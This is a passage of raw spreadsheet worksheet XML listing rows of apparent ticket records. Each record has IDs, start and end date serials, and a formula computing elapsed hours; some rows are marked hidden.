    <row r="1146" spans="1:8">
      <c r="A1146" t="s">
        <v>3280</v>
      </c>
      <c r="B1146">
        <v>12254</v>
      </c>
      <c r="C1146" t="s">
        <v>3281</v>
      </c>
      <c r="D1146" t="s">
        <v>7</v>
      </c>
      <c r="E1146" s="1">
        <v>43397.334305555552</v>
      </c>
      <c r="F1146" s="1">
        <v>43399.605127314811</v>
      </c>
      <c r="G1146" t="s">
        <v>13</v>
      </c>
      <c r="H1146" t="str">
        <f>TEXT(F1146-E1146,"[h]")</f>
        <v>54</v>
      </c>
    </row>
    <row r="1147" spans="1:8" hidden="1">
      <c r="A1147" t="s">
        <v>3282</v>
      </c>
      <c r="B1147">
        <v>12253</v>
      </c>
      <c r="C1147" t="s">
        <v>3283</v>
      </c>
      <c r="D1147" t="s">
        <v>7</v>
      </c>
      <c r="E1147" s="1">
        <v>43396.998865740738</v>
      </c>
      <c r="F1147" s="1">
        <v>43448.986574074072</v>
      </c>
      <c r="G1147" t="s">
        <v>852</v>
      </c>
      <c r="H1147" t="str">
        <f>TEXT(F1147-E1147,"[h]")</f>
        <v>1247</v>
      </c>
    </row>
    <row r="1148" spans="1:8" hidden="1">
      <c r="A1148" t="s">
        <v>3284</v>
      </c>
      <c r="B1148">
        <v>12252</v>
      </c>
      <c r="C1148" t="s">
        <v>3285</v>
      </c>
      <c r="D1148" t="s">
        <v>7</v>
      </c>
      <c r="E1148" s="1">
        <v>43396.72760416667</v>
      </c>
      <c r="F1148" s="1">
        <v>43584.969687500001</v>
      </c>
      <c r="G1148" t="s">
        <v>461</v>
      </c>
      <c r="H1148" t="str">
        <f>TEXT(F1148-E1148,"[h]")</f>
        <v>4517</v>
      </c>
    </row>
    <row r="1149" spans="1:8" hidden="1">
      <c r="A1149" t="s">
        <v>3286</v>
      </c>
      <c r="B1149">
        <v>12251</v>
      </c>
      <c r="C1149" t="s">
        <v>3287</v>
      </c>
      <c r="D1149" t="s">
        <v>7</v>
      </c>
      <c r="E1149" s="1">
        <v>43396.625138888892</v>
      </c>
      <c r="F1149" s="1">
        <v>43398.753159722219</v>
      </c>
      <c r="G1149" t="s">
        <v>3288</v>
      </c>
      <c r="H1149" t="str">
        <f>TEXT(F1149-E1149,"[h]")</f>
        <v>51</v>
      </c>
    </row>
    <row r="1150" spans="1:8" hidden="1">
      <c r="A1150" t="s">
        <v>3289</v>
      </c>
      <c r="B1150">
        <v>12250</v>
      </c>
      <c r="C1150" t="s">
        <v>3290</v>
      </c>
      <c r="D1150" t="s">
        <v>7</v>
      </c>
      <c r="E1150" s="1">
        <v>43396.33699074074</v>
      </c>
      <c r="F1150" s="1">
        <v>43409.256666666668</v>
      </c>
      <c r="G1150" t="s">
        <v>1584</v>
      </c>
      <c r="H1150" t="str">
        <f>TEXT(F1150-E1150,"[h]")</f>
        <v>310</v>
      </c>
    </row>
    <row r="1151" spans="1:8">
      <c r="A1151" t="s">
        <v>3291</v>
      </c>
      <c r="B1151">
        <v>12249</v>
      </c>
      <c r="C1151" t="s">
        <v>3292</v>
      </c>
      <c r="D1151" t="s">
        <v>7</v>
      </c>
      <c r="E1151" s="1">
        <v>43396.220289351855</v>
      </c>
      <c r="F1151" s="1">
        <v>43404.115983796299</v>
      </c>
      <c r="G1151" t="s">
        <v>16</v>
      </c>
      <c r="H1151" t="str">
        <f>TEXT(F1151-E1151,"[h]")</f>
        <v>189</v>
      </c>
    </row>
    <row r="1152" spans="1:8">
      <c r="A1152" t="s">
        <v>3293</v>
      </c>
      <c r="B1152">
        <v>12248</v>
      </c>
      <c r="C1152" t="s">
        <v>3294</v>
      </c>
      <c r="D1152" t="s">
        <v>7</v>
      </c>
      <c r="E1152" s="1">
        <v>43395.885648148149</v>
      </c>
      <c r="F1152" s="1">
        <v>43399.607916666668</v>
      </c>
      <c r="G1152" t="s">
        <v>25</v>
      </c>
      <c r="H1152" t="str">
        <f>TEXT(F1152-E1152,"[h]")</f>
        <v>89</v>
      </c>
    </row>
    <row r="1153" spans="1:8" hidden="1">
      <c r="A1153" t="s">
        <v>3295</v>
      </c>
      <c r="B1153">
        <v>12246</v>
      </c>
      <c r="C1153" t="s">
        <v>3296</v>
      </c>
      <c r="D1153" t="s">
        <v>7</v>
      </c>
      <c r="E1153" s="1">
        <v>43395.76425925926</v>
      </c>
      <c r="F1153" s="1">
        <v>43395.851840277777</v>
      </c>
      <c r="G1153" t="s">
        <v>51</v>
      </c>
      <c r="H1153" t="str">
        <f>TEXT(F1153-E1153,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1154" spans="1:8" hidden="1">
      <c r="A1154" t="s">
        <v>3297</v>
      </c>
      <c r="B1154">
        <v>12245</v>
      </c>
      <c r="C1154" t="s">
        <v>3298</v>
      </c>
      <c r="D1154" t="s">
        <v>7</v>
      </c>
      <c r="E1154" s="1">
        <v>43395.735983796294</v>
      </c>
      <c r="F1154" s="1">
        <v>43396.234259259261</v>
      </c>
      <c r="G1154" t="s">
        <v>2631</v>
      </c>
      <c r="H1154" t="str">
        <f>TEXT(F1154-E1154,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1155" spans="1:8" hidden="1">
      <c r="A1155" t="s">
        <v>3299</v>
      </c>
      <c r="B1155">
        <v>12244</v>
      </c>
      <c r="C1155" t="s">
        <v>3300</v>
      </c>
      <c r="D1155" t="s">
        <v>7</v>
      </c>
      <c r="E1155" s="1">
        <v>43395.725844907407</v>
      </c>
      <c r="F1155" s="1">
        <v>43400.061527777776</v>
      </c>
      <c r="G1155" t="s">
        <v>201</v>
      </c>
      <c r="H1155" t="str">
        <f>TEXT(F1155-E1155,"[h]")</f>
        <v>104</v>
      </c>
    </row>
    <row r="1156" spans="1:8">
      <c r="A1156" t="s">
        <v>3301</v>
      </c>
      <c r="B1156">
        <v>12243</v>
      </c>
      <c r="C1156" t="s">
        <v>3302</v>
      </c>
      <c r="D1156" t="s">
        <v>7</v>
      </c>
      <c r="E1156" s="1">
        <v>43395.609074074076</v>
      </c>
      <c r="F1156" s="1">
        <v>43396.399756944447</v>
      </c>
      <c r="G1156" t="s">
        <v>314</v>
      </c>
      <c r="H1156" t="str">
        <f>TEXT(F1156-E1156,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1157" spans="1:8" hidden="1">
      <c r="A1157" t="s">
        <v>3303</v>
      </c>
      <c r="B1157">
        <v>12241</v>
      </c>
      <c r="C1157" t="s">
        <v>3304</v>
      </c>
      <c r="D1157" t="s">
        <v>7</v>
      </c>
      <c r="E1157" s="1">
        <v>43395.186597222222</v>
      </c>
      <c r="F1157" s="1">
        <v>43416.993101851855</v>
      </c>
      <c r="G1157" t="s">
        <v>2631</v>
      </c>
      <c r="H1157" t="str">
        <f>TEXT(F1157-E1157,"[h]")</f>
        <v>523</v>
      </c>
    </row>
    <row r="1158" spans="1:8">
      <c r="A1158" t="s">
        <v>3305</v>
      </c>
      <c r="B1158">
        <v>12240</v>
      </c>
      <c r="C1158" t="s">
        <v>3306</v>
      </c>
      <c r="D1158" t="s">
        <v>7</v>
      </c>
      <c r="E1158" s="1">
        <v>43395.135057870371</v>
      </c>
      <c r="F1158" s="1">
        <v>43397.15724537037</v>
      </c>
      <c r="G1158" t="s">
        <v>19</v>
      </c>
      <c r="H1158" t="str">
        <f>TEXT(F1158-E1158,"[h]")</f>
        <v>48</v>
      </c>
    </row>
    <row r="1159" spans="1:8">
      <c r="A1159" t="s">
        <v>3307</v>
      </c>
      <c r="B1159">
        <v>12239</v>
      </c>
      <c r="C1159" t="s">
        <v>2727</v>
      </c>
      <c r="D1159" t="s">
        <v>7</v>
      </c>
      <c r="E1159" s="1">
        <v>43394.85193287037</v>
      </c>
      <c r="F1159" s="1">
        <v>43469.626875000002</v>
      </c>
      <c r="G1159" t="s">
        <v>1638</v>
      </c>
      <c r="H1159" t="str">
        <f>TEXT(F1159-E1159,"[h]")</f>
        <v>1794</v>
      </c>
    </row>
    <row r="1160" spans="1:8" hidden="1">
      <c r="A1160" t="s">
        <v>3308</v>
      </c>
      <c r="B1160">
        <v>12238</v>
      </c>
      <c r="C1160" t="s">
        <v>3309</v>
      </c>
      <c r="D1160" t="s">
        <v>7</v>
      </c>
      <c r="E1160" s="1">
        <v>43394.846215277779</v>
      </c>
      <c r="F1160" s="1">
        <v>43394.862118055556</v>
      </c>
      <c r="G1160" t="s">
        <v>3310</v>
      </c>
      <c r="H1160" t="str">
        <f>TEXT(F1160-E1160,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1161" spans="1:8">
      <c r="A1161" t="s">
        <v>3313</v>
      </c>
      <c r="B1161">
        <v>12236</v>
      </c>
      <c r="C1161" t="s">
        <v>3314</v>
      </c>
      <c r="D1161" t="s">
        <v>7</v>
      </c>
      <c r="E1161" s="1">
        <v>43394.741932870369</v>
      </c>
      <c r="F1161" s="1">
        <v>43402.826249999998</v>
      </c>
      <c r="G1161" t="s">
        <v>3315</v>
      </c>
      <c r="H1161" t="str">
        <f>TEXT(F1161-E1161,"[h]")</f>
        <v>194</v>
      </c>
    </row>
    <row r="1162" spans="1:8" hidden="1">
      <c r="A1162" t="s">
        <v>3316</v>
      </c>
      <c r="B1162">
        <v>12235</v>
      </c>
      <c r="C1162" t="s">
        <v>3317</v>
      </c>
      <c r="D1162" t="s">
        <v>7</v>
      </c>
      <c r="E1162" s="1">
        <v>43394.643796296295</v>
      </c>
      <c r="F1162" s="1">
        <v>43415.112627314818</v>
      </c>
      <c r="G1162" t="s">
        <v>174</v>
      </c>
      <c r="H1162" t="str">
        <f>TEXT(F1162-E1162,"[h]")</f>
        <v>491</v>
      </c>
    </row>
    <row r="1163" spans="1:8" hidden="1">
      <c r="A1163" t="s">
        <v>3318</v>
      </c>
      <c r="B1163">
        <v>12234</v>
      </c>
      <c r="C1163" t="s">
        <v>3319</v>
      </c>
      <c r="D1163" t="s">
        <v>7</v>
      </c>
      <c r="E1163" s="1">
        <v>43394.51358796296</v>
      </c>
      <c r="F1163" s="1">
        <v>43479.738657407404</v>
      </c>
      <c r="G1163" t="s">
        <v>883</v>
      </c>
      <c r="H1163" t="str">
        <f>TEXT(F1163-E1163,"[h]")</f>
        <v>2045</v>
      </c>
    </row>
    <row r="1164" spans="1:8" hidden="1">
      <c r="A1164" t="s">
        <v>3320</v>
      </c>
      <c r="B1164">
        <v>12233</v>
      </c>
      <c r="C1164" t="s">
        <v>3321</v>
      </c>
      <c r="D1164" t="s">
        <v>7</v>
      </c>
      <c r="E1164" s="1">
        <v>43394.410069444442</v>
      </c>
      <c r="F1164" s="1">
        <v>43481.378541666665</v>
      </c>
      <c r="G1164" t="s">
        <v>118</v>
      </c>
      <c r="H1164" t="str">
        <f>TEXT(F1164-E1164,"[h]")</f>
        <v>2087</v>
      </c>
    </row>
    <row r="1165" spans="1:8" hidden="1">
      <c r="A1165" t="s">
        <v>3322</v>
      </c>
      <c r="B1165">
        <v>12232</v>
      </c>
      <c r="C1165" t="s">
        <v>3323</v>
      </c>
      <c r="D1165" t="s">
        <v>7</v>
      </c>
      <c r="E1165" s="1">
        <v>43394.106238425928</v>
      </c>
      <c r="F1165" s="1">
        <v>43617.8440162037</v>
      </c>
      <c r="G1165" t="s">
        <v>204</v>
      </c>
      <c r="H1165" t="str">
        <f>TEXT(F1165-E1165,"[h]")</f>
        <v>5369</v>
      </c>
    </row>
    <row r="1166" spans="1:8" hidden="1">
      <c r="A1166" t="s">
        <v>3324</v>
      </c>
      <c r="B1166">
        <v>12231</v>
      </c>
      <c r="C1166" t="s">
        <v>3325</v>
      </c>
      <c r="D1166" t="s">
        <v>7</v>
      </c>
      <c r="E1166" s="1">
        <v>43393.880567129629</v>
      </c>
      <c r="F1166" s="1">
        <v>43396.650648148148</v>
      </c>
      <c r="G1166" t="s">
        <v>3326</v>
      </c>
      <c r="H1166" t="str">
        <f>TEXT(F1166-E1166,"[h]")</f>
        <v>66</v>
      </c>
    </row>
    <row r="1167" spans="1:8">
      <c r="A1167" t="s">
        <v>3327</v>
      </c>
      <c r="B1167">
        <v>12230</v>
      </c>
      <c r="C1167" t="s">
        <v>3328</v>
      </c>
      <c r="D1167" t="s">
        <v>7</v>
      </c>
      <c r="E1167" s="1">
        <v>43393.864895833336</v>
      </c>
      <c r="F1167" s="1">
        <v>43608.182106481479</v>
      </c>
      <c r="G1167" t="s">
        <v>25</v>
      </c>
      <c r="H1167" t="str">
        <f>TEXT(F1167-E1167,"[h]")</f>
        <v>5143</v>
      </c>
    </row>
    <row r="1168" spans="1:8">
      <c r="A1168" t="s">
        <v>3311</v>
      </c>
      <c r="B1168">
        <v>12224</v>
      </c>
      <c r="C1168" t="s">
        <v>3312</v>
      </c>
      <c r="D1168" t="s">
        <v>7</v>
      </c>
      <c r="E1168" s="1">
        <v>43393.020937499998</v>
      </c>
      <c r="F1168" s="1">
        <v>43394.734953703701</v>
      </c>
      <c r="G1168" t="s">
        <v>1420</v>
      </c>
      <c r="H1168" t="str">
        <f>TEXT(F1168-E1168,"[h]")</f>
        <v>41</v>
      </c>
    </row>
    <row r="1169" spans="1:8" hidden="1">
      <c r="A1169" t="s">
        <v>3330</v>
      </c>
      <c r="B1169">
        <v>12223</v>
      </c>
      <c r="C1169" t="s">
        <v>3331</v>
      </c>
      <c r="D1169" t="s">
        <v>7</v>
      </c>
      <c r="E1169" s="1">
        <v>43393.00503472222</v>
      </c>
      <c r="F1169" s="1">
        <v>43405.022164351853</v>
      </c>
      <c r="G1169" t="s">
        <v>670</v>
      </c>
      <c r="H1169" t="str">
        <f>TEXT(F1169-E1169,"[h]")</f>
        <v>288</v>
      </c>
    </row>
    <row r="1170" spans="1:8" hidden="1">
      <c r="A1170" t="s">
        <v>3332</v>
      </c>
      <c r="B1170">
        <v>12222</v>
      </c>
      <c r="C1170" t="s">
        <v>3333</v>
      </c>
      <c r="D1170" t="s">
        <v>7</v>
      </c>
      <c r="E1170" s="1">
        <v>43392.799050925925</v>
      </c>
      <c r="F1170" s="1">
        <v>43394.249583333331</v>
      </c>
      <c r="G1170" t="s">
        <v>2631</v>
      </c>
      <c r="H1170" t="str">
        <f>TEXT(F1170-E1170,"[h]")</f>
        <v>34</v>
      </c>
    </row>
    <row r="1171" spans="1:8" hidden="1">
      <c r="A1171" t="s">
        <v>3334</v>
      </c>
      <c r="B1171">
        <v>12219</v>
      </c>
      <c r="C1171" t="s">
        <v>3335</v>
      </c>
      <c r="D1171" t="s">
        <v>7</v>
      </c>
      <c r="E1171" s="1">
        <v>43392.534097222226</v>
      </c>
      <c r="F1171" s="1">
        <v>43438.685925925929</v>
      </c>
      <c r="G1171" t="s">
        <v>1917</v>
      </c>
      <c r="H1171" t="str">
        <f>TEXT(F1171-E1171,"[h]")</f>
        <v>1107</v>
      </c>
    </row>
    <row r="1172" spans="1:8" hidden="1">
      <c r="A1172" t="s">
        <v>3336</v>
      </c>
      <c r="B1172">
        <v>12218</v>
      </c>
      <c r="C1172" t="s">
        <v>3337</v>
      </c>
      <c r="D1172" t="s">
        <v>7</v>
      </c>
      <c r="E1172" s="1">
        <v>43392.230613425927</v>
      </c>
      <c r="F1172" s="1">
        <v>43395.1253125</v>
      </c>
      <c r="G1172" t="s">
        <v>3338</v>
      </c>
      <c r="H1172" t="str">
        <f>TEXT(F1172-E1172,"[h]")</f>
        <v>69</v>
      </c>
    </row>
    <row r="1173" spans="1:8" hidden="1">
      <c r="A1173" t="s">
        <v>3339</v>
      </c>
      <c r="B1173">
        <v>12217</v>
      </c>
      <c r="C1173" t="s">
        <v>3340</v>
      </c>
      <c r="D1173" t="s">
        <v>7</v>
      </c>
      <c r="E1173" s="1">
        <v>43391.942800925928</v>
      </c>
      <c r="F1173" s="1">
        <v>43392.043796296297</v>
      </c>
      <c r="G1173" t="s">
        <v>2631</v>
      </c>
      <c r="H1173" t="str">
        <f>TEXT(F1173-E1173,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1174" spans="1:8" hidden="1">
      <c r="A1174" t="s">
        <v>3341</v>
      </c>
      <c r="B1174">
        <v>12216</v>
      </c>
      <c r="C1174" t="s">
        <v>3342</v>
      </c>
      <c r="D1174" t="s">
        <v>7</v>
      </c>
      <c r="E1174" s="1">
        <v>43391.869386574072</v>
      </c>
      <c r="F1174" s="1">
        <v>43392.044814814813</v>
      </c>
      <c r="G1174" t="s">
        <v>2631</v>
      </c>
      <c r="H1174" t="str">
        <f>TEXT(F1174-E1174,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1175" spans="1:8" hidden="1">
      <c r="A1175" t="s">
        <v>3343</v>
      </c>
      <c r="B1175">
        <v>12215</v>
      </c>
      <c r="C1175" t="s">
        <v>3344</v>
      </c>
      <c r="D1175" t="s">
        <v>7</v>
      </c>
      <c r="E1175" s="1">
        <v>43391.858159722222</v>
      </c>
      <c r="F1175" s="1">
        <v>43405.963287037041</v>
      </c>
      <c r="G1175" t="s">
        <v>2780</v>
      </c>
      <c r="H1175" t="str">
        <f>TEXT(F1175-E1175,"[h]")</f>
        <v>338</v>
      </c>
    </row>
    <row r="1176" spans="1:8" hidden="1">
      <c r="A1176" t="s">
        <v>3345</v>
      </c>
      <c r="B1176">
        <v>12214</v>
      </c>
      <c r="C1176" t="s">
        <v>3346</v>
      </c>
      <c r="D1176" t="s">
        <v>7</v>
      </c>
      <c r="E1176" s="1">
        <v>43391.837118055555</v>
      </c>
      <c r="F1176" s="1">
        <v>43399.721319444441</v>
      </c>
      <c r="G1176" t="s">
        <v>2780</v>
      </c>
      <c r="H1176" t="str">
        <f>TEXT(F1176-E1176,"[h]")</f>
        <v>189</v>
      </c>
    </row>
    <row r="1177" spans="1:8" hidden="1">
      <c r="A1177" t="s">
        <v>3347</v>
      </c>
      <c r="B1177">
        <v>12213</v>
      </c>
      <c r="C1177" t="s">
        <v>3348</v>
      </c>
      <c r="D1177" t="s">
        <v>7</v>
      </c>
      <c r="E1177" s="1">
        <v>43391.790856481479</v>
      </c>
      <c r="F1177" s="1">
        <v>43398.753159722219</v>
      </c>
      <c r="G1177" t="s">
        <v>1969</v>
      </c>
      <c r="H1177" t="str">
        <f>TEXT(F1177-E1177,"[h]")</f>
        <v>167</v>
      </c>
    </row>
    <row r="1178" spans="1:8" hidden="1">
      <c r="A1178" t="s">
        <v>3349</v>
      </c>
      <c r="B1178">
        <v>12212</v>
      </c>
      <c r="C1178" t="s">
        <v>3350</v>
      </c>
      <c r="D1178" t="s">
        <v>7</v>
      </c>
      <c r="E1178" s="1">
        <v>43391.752858796295</v>
      </c>
      <c r="F1178" s="1">
        <v>43400.680046296293</v>
      </c>
      <c r="G1178" t="s">
        <v>28</v>
      </c>
      <c r="H1178" t="str">
        <f>TEXT(F1178-E1178,"[h]")</f>
        <v>214</v>
      </c>
    </row>
    <row r="1179" spans="1:8" hidden="1">
      <c r="A1179" t="s">
        <v>3351</v>
      </c>
      <c r="B1179">
        <v>12211</v>
      </c>
      <c r="C1179" t="s">
        <v>3352</v>
      </c>
      <c r="D1179" t="s">
        <v>7</v>
      </c>
      <c r="E1179" s="1">
        <v>43391.461782407408</v>
      </c>
      <c r="F1179" s="1">
        <v>43392.651898148149</v>
      </c>
      <c r="G1179" t="s">
        <v>255</v>
      </c>
      <c r="H1179" t="str">
        <f>TEXT(F1179-E1179,"[h]")</f>
        <v>28</v>
      </c>
    </row>
    <row r="1180" spans="1:8">
      <c r="A1180" t="s">
        <v>3353</v>
      </c>
      <c r="B1180">
        <v>12210</v>
      </c>
      <c r="C1180" t="s">
        <v>3354</v>
      </c>
      <c r="D1180" t="s">
        <v>7</v>
      </c>
      <c r="E1180" s="1">
        <v>43391.432824074072</v>
      </c>
      <c r="F1180" s="1">
        <v>43392.684664351851</v>
      </c>
      <c r="G1180" t="s">
        <v>849</v>
      </c>
      <c r="H1180" t="str">
        <f>TEXT(F1180-E1180,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1181" spans="1:8" hidden="1">
      <c r="A1181" t="s">
        <v>3355</v>
      </c>
      <c r="B1181">
        <v>12209</v>
      </c>
      <c r="C1181" t="s">
        <v>3356</v>
      </c>
      <c r="D1181" t="s">
        <v>7</v>
      </c>
      <c r="E1181" s="1">
        <v>43391.431226851855</v>
      </c>
      <c r="F1181" s="1">
        <v>43392.940949074073</v>
      </c>
      <c r="G1181" t="s">
        <v>1302</v>
      </c>
      <c r="H1181" t="str">
        <f>TEXT(F1181-E1181,"[h]")</f>
        <v>36</v>
      </c>
    </row>
    <row r="1182" spans="1:8">
      <c r="A1182" t="s">
        <v>3357</v>
      </c>
      <c r="B1182">
        <v>12206</v>
      </c>
      <c r="C1182" t="s">
        <v>3358</v>
      </c>
      <c r="D1182" t="s">
        <v>7</v>
      </c>
      <c r="E1182" s="1">
        <v>43391.228564814817</v>
      </c>
      <c r="F1182" s="1">
        <v>43397.15724537037</v>
      </c>
      <c r="G1182" t="s">
        <v>123</v>
      </c>
      <c r="H1182" t="str">
        <f>TEXT(F1182-E1182,"[h]")</f>
        <v>142</v>
      </c>
    </row>
    <row r="1183" spans="1:8" hidden="1">
      <c r="A1183" t="s">
        <v>3359</v>
      </c>
      <c r="B1183">
        <v>12205</v>
      </c>
      <c r="C1183" t="s">
        <v>3360</v>
      </c>
      <c r="D1183" t="s">
        <v>7</v>
      </c>
      <c r="E1183" s="1">
        <v>43391.215925925928</v>
      </c>
      <c r="F1183" s="1">
        <v>43719.687418981484</v>
      </c>
      <c r="G1183" t="s">
        <v>1510</v>
      </c>
      <c r="H1183" t="str">
        <f>TEXT(F1183-E1183,"[h]")</f>
        <v>7883</v>
      </c>
    </row>
    <row r="1184" spans="1:8" hidden="1">
      <c r="A1184" t="s">
        <v>3361</v>
      </c>
      <c r="B1184">
        <v>12202</v>
      </c>
      <c r="C1184" t="s">
        <v>3362</v>
      </c>
      <c r="D1184" t="s">
        <v>7</v>
      </c>
      <c r="E1184" s="1">
        <v>43391.043865740743</v>
      </c>
      <c r="F1184" s="1">
        <v>43628.090069444443</v>
      </c>
      <c r="G1184" t="s">
        <v>118</v>
      </c>
      <c r="H1184" t="str">
        <f>TEXT(F1184-E1184,"[h]")</f>
        <v>5689</v>
      </c>
    </row>
    <row r="1185" spans="1:8" hidden="1">
      <c r="A1185" t="s">
        <v>3363</v>
      </c>
      <c r="B1185">
        <v>12201</v>
      </c>
      <c r="C1185" t="s">
        <v>3364</v>
      </c>
      <c r="D1185" t="s">
        <v>7</v>
      </c>
      <c r="E1185" s="1">
        <v>43391.003136574072</v>
      </c>
      <c r="F1185" s="1">
        <v>43476.632060185184</v>
      </c>
      <c r="G1185" t="s">
        <v>2780</v>
      </c>
      <c r="H1185" t="str">
        <f>TEXT(F1185-E1185,"[h]")</f>
        <v>2055</v>
      </c>
    </row>
    <row r="1186" spans="1:8">
      <c r="A1186" t="s">
        <v>3365</v>
      </c>
      <c r="B1186">
        <v>12200</v>
      </c>
      <c r="C1186" t="s">
        <v>3366</v>
      </c>
      <c r="D1186" t="s">
        <v>7</v>
      </c>
      <c r="E1186" s="1">
        <v>43390.804050925923</v>
      </c>
      <c r="F1186" s="1">
        <v>43396.399756944447</v>
      </c>
      <c r="G1186" t="s">
        <v>1709</v>
      </c>
      <c r="H1186" t="str">
        <f>TEXT(F1186-E1186,"[h]")</f>
        <v>134</v>
      </c>
    </row>
    <row r="1187" spans="1:8" hidden="1">
      <c r="A1187" t="s">
        <v>3367</v>
      </c>
      <c r="B1187">
        <v>12199</v>
      </c>
      <c r="C1187" t="s">
        <v>3368</v>
      </c>
      <c r="D1187" t="s">
        <v>7</v>
      </c>
      <c r="E1187" s="1">
        <v>43390.69971064815</v>
      </c>
      <c r="F1187" s="1">
        <v>43390.731759259259</v>
      </c>
      <c r="G1187" t="s">
        <v>55</v>
      </c>
      <c r="H1187" t="str">
        <f>TEXT(F1187-E1187,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1188" spans="1:8" hidden="1">
      <c r="A1188" t="s">
        <v>3369</v>
      </c>
      <c r="B1188">
        <v>12195</v>
      </c>
      <c r="C1188" t="s">
        <v>3370</v>
      </c>
      <c r="D1188" t="s">
        <v>7</v>
      </c>
      <c r="E1188" s="1">
        <v>43390.149861111109</v>
      </c>
      <c r="F1188" s="1">
        <v>43663.568425925929</v>
      </c>
      <c r="G1188" t="s">
        <v>157</v>
      </c>
      <c r="H1188" t="str">
        <f>TEXT(F1188-E1188,"[h]")</f>
        <v>6562</v>
      </c>
    </row>
    <row r="1189" spans="1:8">
      <c r="A1189" t="s">
        <v>3371</v>
      </c>
      <c r="B1189">
        <v>12194</v>
      </c>
      <c r="C1189" t="s">
        <v>3372</v>
      </c>
      <c r="D1189" t="s">
        <v>7</v>
      </c>
      <c r="E1189" s="1">
        <v>43390.147152777776</v>
      </c>
      <c r="F1189" s="1">
        <v>43393.217569444445</v>
      </c>
      <c r="G1189" t="s">
        <v>3373</v>
      </c>
      <c r="H1189" t="str">
        <f>TEXT(F1189-E1189,"[h]")</f>
        <v>73</v>
      </c>
    </row>
    <row r="1190" spans="1:8" hidden="1">
      <c r="A1190" t="s">
        <v>1772</v>
      </c>
      <c r="B1190">
        <v>12192</v>
      </c>
      <c r="C1190" t="s">
        <v>3374</v>
      </c>
      <c r="D1190" t="s">
        <v>7</v>
      </c>
      <c r="E1190" s="1">
        <v>43389.934606481482</v>
      </c>
      <c r="F1190" s="1">
        <v>43394.882708333331</v>
      </c>
      <c r="G1190" t="s">
        <v>66</v>
      </c>
      <c r="H1190" t="str">
        <f>TEXT(F1190-E1190,"[h]")</f>
        <v>118</v>
      </c>
    </row>
    <row r="1191" spans="1:8">
      <c r="A1191" t="s">
        <v>3375</v>
      </c>
      <c r="B1191">
        <v>12191</v>
      </c>
      <c r="C1191" t="s">
        <v>3376</v>
      </c>
      <c r="D1191" t="s">
        <v>7</v>
      </c>
      <c r="E1191" s="1">
        <v>43389.863321759258</v>
      </c>
      <c r="F1191" s="1">
        <v>43390.009710648148</v>
      </c>
      <c r="G1191" t="s">
        <v>98</v>
      </c>
      <c r="H1191" t="str">
        <f>TEXT(F1191-E1191,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1192" spans="1:8" hidden="1">
      <c r="A1192" t="s">
        <v>3385</v>
      </c>
      <c r="B1192">
        <v>12185</v>
      </c>
      <c r="C1192" t="s">
        <v>3386</v>
      </c>
      <c r="D1192" t="s">
        <v>7</v>
      </c>
      <c r="E1192" s="1">
        <v>43389.772962962961</v>
      </c>
      <c r="F1192" s="1">
        <v>43390.702349537038</v>
      </c>
      <c r="G1192" t="s">
        <v>2780</v>
      </c>
      <c r="H1192" t="str">
        <f>TEXT(F1192-E1192,"[h]")</f>
        <v>22</v>
      </c>
    </row>
    <row r="1193" spans="1:8" hidden="1">
      <c r="A1193" t="s">
        <v>3387</v>
      </c>
      <c r="B1193">
        <v>12181</v>
      </c>
      <c r="C1193" t="s">
        <v>3388</v>
      </c>
      <c r="D1193" t="s">
        <v>7</v>
      </c>
      <c r="E1193" s="1">
        <v>43389.446111111109</v>
      </c>
      <c r="F1193" s="1">
        <v>43389.674097222225</v>
      </c>
      <c r="G1193" t="s">
        <v>174</v>
      </c>
      <c r="H1193" t="str">
        <f>TEXT(F1193-E1193,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1194" spans="1:8" hidden="1">
      <c r="A1194" t="s">
        <v>3389</v>
      </c>
      <c r="B1194">
        <v>12179</v>
      </c>
      <c r="C1194" t="s">
        <v>3390</v>
      </c>
      <c r="D1194" t="s">
        <v>7</v>
      </c>
      <c r="E1194" s="1">
        <v>43389.238865740743</v>
      </c>
      <c r="F1194" s="1">
        <v>43390.866284722222</v>
      </c>
      <c r="G1194" t="s">
        <v>174</v>
      </c>
      <c r="H1194" t="str">
        <f>TEXT(F1194-E1194,"[h]")</f>
        <v>39</v>
      </c>
    </row>
    <row r="1195" spans="1:8">
      <c r="B1195">
        <v>12178</v>
      </c>
      <c r="C1195" t="s">
        <v>3391</v>
      </c>
      <c r="D1195" t="s">
        <v>7</v>
      </c>
      <c r="E1195" s="1">
        <v>43389.133425925924</v>
      </c>
      <c r="F1195" s="1">
        <v>43621.305856481478</v>
      </c>
      <c r="G1195" t="s">
        <v>3392</v>
      </c>
      <c r="H1195" t="str">
        <f>TEXT(F1195-E1195,"[h]")</f>
        <v>5572</v>
      </c>
    </row>
    <row r="1196" spans="1:8" hidden="1">
      <c r="A1196" t="s">
        <v>3393</v>
      </c>
      <c r="B1196">
        <v>12177</v>
      </c>
      <c r="C1196" t="s">
        <v>3394</v>
      </c>
      <c r="D1196" t="s">
        <v>7</v>
      </c>
      <c r="E1196" s="1">
        <v>43388.901770833334</v>
      </c>
      <c r="F1196" s="1">
        <v>43390.152870370373</v>
      </c>
      <c r="G1196" t="s">
        <v>163</v>
      </c>
      <c r="H1196" t="str">
        <f>TEXT(F1196-E1196,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1197" spans="1:8" hidden="1">
      <c r="A1197" t="s">
        <v>3395</v>
      </c>
      <c r="B1197">
        <v>12176</v>
      </c>
      <c r="C1197" t="s">
        <v>3396</v>
      </c>
      <c r="D1197" t="s">
        <v>7</v>
      </c>
      <c r="E1197" s="1">
        <v>43387.962222222224</v>
      </c>
      <c r="F1197" s="1">
        <v>43388.19</v>
      </c>
      <c r="G1197" t="s">
        <v>2631</v>
      </c>
      <c r="H1197" t="str">
        <f>TEXT(F1197-E1197,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1198" spans="1:8" hidden="1">
      <c r="A1198" t="s">
        <v>3397</v>
      </c>
      <c r="B1198">
        <v>12175</v>
      </c>
      <c r="C1198" t="s">
        <v>3398</v>
      </c>
